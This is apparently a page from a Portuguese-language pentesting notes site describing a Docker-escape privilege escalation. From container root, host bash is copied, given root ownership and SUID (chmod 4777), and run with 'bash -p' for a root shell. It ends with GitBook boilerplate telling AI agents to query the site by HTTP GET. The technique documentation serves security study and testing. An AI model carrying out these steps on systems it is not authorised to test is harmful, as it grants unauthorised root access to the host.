> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/privesc/docker-escape/docker-suid-permission-manipulation-linux-privilege-escalation.md).

# Manipulação de Permissão SUID para Escape de Docker - Escalonamento de Privilégios no Linux

## O que é

Os caminhos de escape do Docker abusam de configurações incorretas do contêiner, recursos do host montados, credenciais padrão, senhas reutilizadas ou privilégios excessivos do contêiner. O objetivo é passar do contexto do contêiner para acesso no nível do host. Esta página específica se concentra em **Escape do Docker (Manipulação de Permissões SUID)** e mantém o fluxo de exploração prático: identifique a condição, valide-a com segurança e então execute o payload menor necessário para comprovar o impacto.

## Enumeração

Comece confirmando o contexto local e a configuração incorreta exata antes de executar o caminho de exploração.

```bash
id
cat /proc/1/cgroup
mount
ls -la /var/run/docker.sock 2>/dev/null
```

## Exemplos

## Bash SUID a partir do Docker

Como no contêiner Docker somos root, vamos copiar o binário bash do host normal da máquina para o diretório home de `augustus`:

```
cp /bin/bash .
```

<figure><img src="/files/e30b52b08670bc0f19322cdf0cb359b47f8fcf6d" alt="" width="556"><figcaption></figcaption></figure>

A partir do root do Docker, vamos permitir o grupo root para este arquivo bash e permissões SUID para executá-lo como root:

```bash
chown root:root bash
chmod 4777 bash
```

Voltamos ao SSH e vemos:

`-rwsrwxrwx 1 root root 1234376 Oct 28 11:35 bash`

<figure><img src="/files/c23662025d57d14d72905dcc2755e6cbb9da69f8" alt=""><figcaption></figcaption></figure>

`./bash -p`


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/privesc/docker-escape/docker-suid-permission-manipulation-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
